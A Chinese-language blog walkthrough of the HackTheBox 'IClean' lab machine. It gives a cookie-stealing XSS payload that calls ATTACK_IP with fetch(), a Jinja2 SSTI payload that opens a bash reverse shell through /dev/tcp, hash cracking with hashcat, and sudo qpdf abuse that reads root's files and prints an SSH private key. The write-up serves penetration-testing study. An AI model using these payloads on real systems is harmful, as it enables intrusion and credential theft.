Hackthebox IClean

最新推荐文章于 2024-11-10 15:01:17 发布
最新推荐文章于 2024-11-10 15:01:17 发布
阅读量2.5k 收藏 7
点赞数 5
文章标签: 网络安全 python linux 安全
J
本文链接:https://blog.csdn.net/Che_ng/article/details/137463890
版权

在这里插入图片描述

靶机信息
IP/
难度Medium
网址https://app.hackthebox.com/machines/IClean
状态Active
系统Linux

Python XSS, SSTI

端口扫描

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 2cf90777e3f13a36dbf23b94e3b7cfb2 (ECDSA)
|_  256 4a919ff274c04181524df1ff2d01786b (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Capiclean
| http-server-header: 
|   Apache/2.4.52 (Ubuntu)
|_  Werkzeug/2.3.7 Python/3.10.12
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80端口是一个Python语言编写的网站

目录扫描

└──╼ []$ feroxbuster -u http://capiclean.htb/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt 
200      GET      193l      579w     8592c http://capiclean.htb/services
200      GET      183l      564w     8109c http://capiclean.htb/team
200      GET      154l      399w     6084c http://capiclean.htb/choose
405      GET        5l       20w      153c http://capiclean.htb/sendMessage
200      GET       90l      181w     2237c http://capiclean.htb/quote
200      GET      130l      355w     5267c http://capiclean.htb/about
302      GET        5l       22w      189c http://capiclean.htb/dashboard => http://capiclean.htb/

从扫描结果看不出什么,访问网站

需要将ip capiclean.htb 加到 /etc/hosts

Web服务

XSS

访问http://ip重定向到http://capiclean.htb
在这里插入图片描述

网页http://capiclean.htb/quote可以进行邮件发送,使用burpsuite 进行抓包

POST /sendMessage HTTP/1.1
Host: capiclean.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Origin: http://capiclean.htb
Connection: close
Referer: http://capiclean.htb/quote
Upgrade-Insecure-Requests: 1

service=Carpet+Cleaning&email=st4rry%40123.com

修改service为xss payload

<img src=x onerror=fetch("http://ATTACK_IP:1234/"+document.cookie);>

需要在本地开启一个web服务,端口为1234 python3 -m http.server 1234
发送Payload (需要进行url编码)

service=<img+src%3dx+onerror%3dfetch("http%3a//ATTACK_IP%3a1234/"%2bdocument.cookie)%3b>&email=st4rry%40123.com

获得/session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhH4HA.aNIxanp6PnaHyYARzxwzROrllow
添加为cookie,刷新页面,访问http://ip/dashboard即可进入管理员面板

SSTI

访问http://capiclean.htb/InvoiceGenerator先生成一个ID,随便填写,这里生成的ID为1824617504
接着访问http://capiclean.htb/QRGenerator,填写上述的ID,会生成一个二维码图片链接
Burpsuite抓抓包,qr_link存在ssti漏洞

POST /QRGenerator HTTP/1.1
Host: capiclean.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://capiclean.htb
Connection: close
Referer: http://capiclean.htb/QRGenerator
Cookie: session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZhH4HA.aNIxanp6PnaHyYARzxwzROrllow
Upgrade-Insecure-Requests: 1

invoice_id=&form_type=scannable_invoice&qr_link={{8*8}}

反弹shell的payload

{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("bash -c '/bin/bash -i >& /dev/tcp/ATTACK_IP/4444 0>&1'")|attr("read")()}}

攻击机进行监听4444端口,burpsuite发包即可成功反弹shell

GeShell

加固shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg

在源码app.py中获得mysql的凭据

db_config = {
    'host': '127.0.0.1',
    'user': 'iclean',
    'password': 'pxCsmnGLckUb',
    'database': 'capiclean'
}

查看数据库

mysql> select * from capiclean.users;
+----+----------+------------------------------------------------------------------+----------------------------------+
| id | username | password                                                         | role_id                          |
+----+----------+------------------------------------------------------------------+----------------------------------+
|  1 | admin    | 2ae316f10d49222f369139ce899e414e57ed9e339bb75457446f2ba8628a6e51 | 21232f297a57a5a743894a0e4a801fc3 |
|  2 | consuela | 0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa | ee11cbb19052e40b07aac0ca060c23ee |
+----+----------+------------------------------------------------------------------+----------------------------------+
2 rows in set (0.00 sec)

查看hash类型

└─\ ✨ nth -t '0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa'

  _   _                           _____ _           _          _   _           _     
 | \ | |                         |_   _| |         | |        | | | |         | |    
 |  \| | __ _ _ __ ___   ___ ______| | | |__   __ _| |_ ______| |_| | __ _ ___| |__  
 | . ` |/ _` | '_ ` _ \ / _ \______| | | '_ \ / _` | __|______|  _  |/ _` / __| '_ \ 
 | |\  | (_| | | | | | |  __/      | | | | | | (_| | |_       | | | | (_| \__ \ | | |
 \_| \_/\__,_|_| |_| |_|\___|      \_/ |_| |_|\__,_|\__|      \_| |_/\__,_|___/_| |_|

https://twitter.com/bee_sec_san
https://github.com/HashPals/Name-That-Hash 


0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa

Most Likely
SHA-256, HC: 1400 JtR: raw-sha256 Summary: 256-bit key and is a good partner-function for AES. Can be used in Shadow files.
Keccak-256, HC: 17800
Haval-128, JtR: haval-128-4
Snefru-256, JtR: snefru-256

使用hashcat进行破解

└─\ ✨ hashcat -m 1400 -a 0 consuela.hash /usr/share/wordlists/rockyou.txt
0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa:simple and clean

使用ssh登陆
获取到user flag

提权

sudo -l 起手

consuela@iclean:~$ sudo -l
[sudo] password for consuela:
Matching Defaults entries for consuela on iclean:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User consuela may run the following commands on iclean:
    (ALL) /usr/bin/qpdf

运行qpdf - QPDF 11.9.0文档 — Running qpdf — QPDF 11.9.0 documentation
使用命令读取root flag

sudo /usr/bin/qpdf --empty /tmp/root.txt --qdf --add-attachment /root/root.txt --

读取root的私钥

sudo /usr/bin/qpdf --empty /tmp/root.txt --qdf --add-attachment /root/.ssh/id_rsa --
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS
1zaGEyLW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQQMb6Wn/o1SBLJUpiVfUaxWHAE64hBN
vX1ZjgJ9wc9nfjEqFS+jAtTyEljTqB+DjJLtRfP4N40SdoZ9yvekRQDRAAAAqGOKt0ljir
dJAAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAxvpaf+jVIEslSm
JV9RrFYcATriEE29fVmOAn3Bz2d+MSoVL6MC1PISWNOoH4OMku1F8/g3jRJ2hn3K96RFAN
EAAAAgK2QvEb+leR18iSesuyvCZCW1mI+YDL7sqwb+XMiIE/4AAAALcm9vdEBpY2xlYW4B
AgMEBQ==
-----END OPENSSH PRIVATE KEY-----
Che_ng
关注
[渗透测试学习] IClean-HackTheBox
rev1ve的博客
06-15 138
我们可以利用其参数读取root的flag(注意要在tmp目录下才能下载root.txt)参数,网上搜索发现qpdf是一个内容转换工具,有对应的使用文档。得到cookie后我们来验证一下,使用cookie成功访问。回显49应该就是Jinja2,直接payload测试一下(先识别一下是什么加密,然后john爆破记得加上format。直接反弹shell(注意bash命令URL编码一下)(xss注入的payload均url编码过)勾选上去抓包,测试各个参数是否存在注入。路由可以,应该是经过身份验证跳转到。
HTB (hackthebox )Socket WriteUp ---- Season 靶机
qq_58869808的博客
03-28 5648
HTB (hackthebox )Socket WriteUp ---- Season 靶机
Linux/Iclean
ve9etable的博客
04-15 765
先使用默认规则扫描常用的端口,发现对外开放了 22 和 80 端口,然后扫描这两个端口的详细信息,结果如下,很常规的结果,没发现什么有趣的东西。
hackthebox IClean
EdSu12138的博客
04-07 1124
nmap 信息收集 写hosts-> 访问网站找到交互点->xss反弹admin Cookie -> 利用admin Cookie 找到存在漏洞点->关于flask的SSTI注入->尝试注入->反弹shell->找到数据库密码->cmd5破解密码->ssh登录->get user flag -> qpdf 越权查看root.txt。发现一个突破点 flask 生成随机页面 让我想起来一个远古的东西 (因为是很久之前了解到的 现在突然想起来了) 关于flask的SSTI注入 赶紧恶补一下。
打靶日记--hackthebox--IClean
qq_64036695的博客
04-15 1014
linux在/etc/hosts手动将域名映射到特定的 IP 地址,从而绕过 DNS 解析的需要,windows则在C:\Windows\System32\drivers\etc做添加:(我这里是linux)可以以root权限执行,那么以前打ctf的知识就用上了哈哈哈哈,把root用户的ssh私钥嵌入到pdf中,攻击机去下载,使用ctf常用工具binwalk分离文件,然后得到ssh私钥登录root用户,直接拿下!它设置一个端口转发配置,将目标计算机上端口 3306 的连接转发到本地主机上的端口 3306。
HackTheBox--IClean
七天
07-08 789
IClean测试过程。
HackTheBox-Monitors WP
h1nt的博客
10-23 2911
0x01 端口探测 使用nmap对靶机端口进行探测: nmap -sC -sV -v 10.10.10.238 发现只有两个端口是开着的: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e
0x0F-HackTheBox-Control
0pr
05-12 728
Command History masscan - found several service ports - effective nmap - found http methods and some other services - effective gobuster - found some redirect directories - effective Burp Suite - modified some headers to repeat the request - ineffective Ct
HackTheBox YUMMY靶机渗透实录
qq_36129581的博客
10-13 1079
有22端口和80端口,22端口应该暂时用不到。80端口是http服务,可以访问看看有没有突破口。看到这个网页,能交互的都点一下,发现有个预定桌席可以交互,点进去,提交一个预定,然后进面板中,点击保存日历,发现可以下载到文件,这时想到可能可以下载到系统文件。那我们就可以借助这个操作来修改请求来请求文件。这时打开burp软件拦截网页的请求。点击save按键,查看拦截的请求。这个包没什么问题直接forward。
[渗透测试学习] Clicker - HackTheBox
rev1ve的博客
01-10 850
NFS最大的功能就是可以透过网络,让不同的机器、不同的操作系统、可以彼此分享个别的档案(share files)。这个NFS服务器可以让你的PC来将网络远程的NFS服务器分享的目录,挂载到本地端的机器当中,在本地端的机器看起来,那个远程主机的目录就好像是自己的一个磁盘分区槽一样(partition),使用上相当的便利。否则,将会构建一个 MySQL 命令并执行它,因为拼接的路径为。很明显,保存的数据中只有nickname可以让我们写马,而如何修改nickname的值就和刚刚修改role一样的办法。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8539
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
python GUI编码入门-21】如何用Tkinter创建一个记事本应用
木头大左的博客
11-08 51
在现代编程环境中,图形用户界面(GUI)应用程序的开发变得越来越重要。Python的Tkinter库是一个功能强大且易于使用的GUI工具包,非常适合初学者和有经验的开发者使用。本文将详细介绍如何使用Tkinter创建一个简易的记事本应用,涵盖从安装到实现各项功能的全过程。Tkinter是Python的标准GUI库,它提供了丰富的接口来创建窗口、对话框、按钮等常见的GUI组件。Tkinter具有良好的跨平台性,可以在Windows、Mac OS和Linux上运行。
一次薅国家超算平台的记录
weixin_55179972的博客
11-07 407
参与 谁是下一个“AI”跃人 -AI体验推介活动,赢取千元算力券!(https://www.scnet.cn/home/subject/modular/index270.html)2. Clone开源的Llama3 Chinese (https://github.com/LlamaFamily/Llama-Chinese)活动名称主题:国家超算互联网「AI跃升季」:谁是下一个“AI”跃人 - AI算力体验活动。其中位置1,2替换为商品基模型和训练出来的微调模型。模型改为商城下载的模型。2、运行的过程记录。
推荐一款管道数据检索工具:Pipedata-Pro
11-09 349
是一款专为设计石油、天然气、水和蒸汽管道及管道系统的工程师开发的应用程序。该应用程序提供了设计管道系统所需的工程数据,拥有一个全面的管道类型、配件和材料。
大模型落地之ollama控制设备
weixin_44772948的博客
11-10 65
本地环境:ollama3.2(理论上ollama3.1以上就支持tool功能,但是笔者没有试过)(PS:不足点,在输入不是控制指令的相关问题时,大概率也会调用工具,需要后续调优)
Golang--文件操作
cookies_s_的博客
11-07 429
文件操作
Python 中测试函数调用顺序
weixin_44617651的博客
11-08 296
Python 中测试函数调用顺序是一个常见的需求。例如,您可能有一个对象 ​​Obj​​,其中包含三个方法:​​method1​​、​​method2​​ 和 ​​method3​​。您还编写了一个函数 ​​do_something​​,该函数调用这些方法。您想编写一个测试来测试 ​​do_something​​ 函数和 ​​Obj​​ 对象。但是,您不想直接模拟或改变 ​​Obj​​ 对象的行为。您需要一种方法来获取在 ​​obj​​ 对象上调用的方法列表,而无需更改其行为。
【优雅的在Java程序中判空和Null】
最新发布
在这个充满危险的乱世之中,只有学会烤鸡才能顽强的活下去。
11-10 83
在Entity中添加。
用于图像识别的判别图正则化技术
博客之路,前途漫漫
11-08 1789
MNIST手写数字识别数据集是目前最经典的图像识别数据集,其中包括70000张图片样本,其中60000张作为训练集,10000张作为测试集。ORL(Olivetti Research Laboratory)人脸识别数据集由剑桥大学计算机实验室的Olivetti研究实验室于1992年创建,包含40个人的面部图像,图像尺寸为92x112像素,灰度图像。每个人的图像在时间上有不同间隔,包含不同的光照条件、面部表情和细微变化,图像格式为PGM,按照人物ID分类存储。
芯片设计Hack Clean
04-02
I'm sorry, as an AI language model, I cannot provide instructions or suggestions on hacking or any illegal activities. My purpose is to assist users in generating human-like language based on the given prompts.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值